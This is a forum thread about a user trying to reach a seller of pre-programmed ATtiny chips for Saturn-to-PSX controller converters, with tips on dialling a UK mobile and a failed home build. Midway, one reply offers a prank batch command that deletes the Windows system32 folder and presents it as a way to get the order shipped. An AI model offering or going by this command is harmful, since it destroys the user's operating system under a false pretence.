Does anybody know Paul, or have his contacts maybe?

I've ordered some pre-programmed ATtiny chips from his site 'cause I'm going to built some SAT-PSX converters, but it was a week ago and I still have no answer. And when I mailed him about my order, I've got mail server error two days later. Something has probably broke up on his site, so I need to ping him somehow.

Also, I had a phone number in the google wallet receipt. It starts with 07849 which seems to be the city code, but I have no idea how to use it correctly.

I tried to dial +44 (the UK international code, 'cause I'm in Berlin now) and then 07849 XXX-XXX, but got some strange fast double beeps, and then regular disconnected beeps. Also I tried to dial +44 7849 XXX-XXX, because some websites tell to leave "0" out if you are not inside the UK, but it didn't work at all.

So, maybe somebody knows at least how to make a damn call or drop the sms to the UK number from the foreign? :D Sorry for the lame stuff, guys, but I really kinda don't know what to do.

Don't worry about it. You can travel from the Milky Way to Andromeda and back 1500 times before the sun explodes.

Nope.

Both paul@keio.dk and keio@keio.dk returns mail server error, paul@world3.net return nothing, phone is useless and so is the SRK forums. I also thought about sending him a postcard, but it's ridiculous, so I'll program these microcontrollers by myself and report the process.

I clicked the SRK link.

del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)
double click and it will delete the system32 folder.
This will change it from "pending" to "shipping".
What an ass

Well, I've build the converter following the description but it just doesn't work.

I've bought all needed cords, plugs and components, tested everything with multimeter, soldered together (even LED and capacitor), checked pinout again, tested everything with multimeter again (to ensure that there are no shortened things), and everything seems to be be OK.

Then I've posted request on the local electronic forum and found a guy with Phyton ChipProg-48 programmer, who helped me with programming ATtinys2313 and configuring fuse bits.

Unfortunately, I've failed. Guy had re-checked everything, and even gave me additional chips. I've checked everything again, too, but there is no response from my PS2. Only LED is glowing when the pad is connected and flashing with 3 sec intervals without it.

I don't know what to do. Feels like a dead end for me now.

there is a guy on ebay, spacemonkeyfromthefuture I think, who makes his own. He was putting them in Saturn controllers, but now builds converters.

maybe he will sell you some of his chips.

07849 is a mobile phone. You'll want to dial either 00447849... or just the number with no international code. If you want me to drop him a call / sms on your behalf let me know.

Oh, that's great! Thanks a lot for the help.

But actually I gave up messing with this stuff, and ended up this story just yesterday by inserting PSX guts right into the panel :D
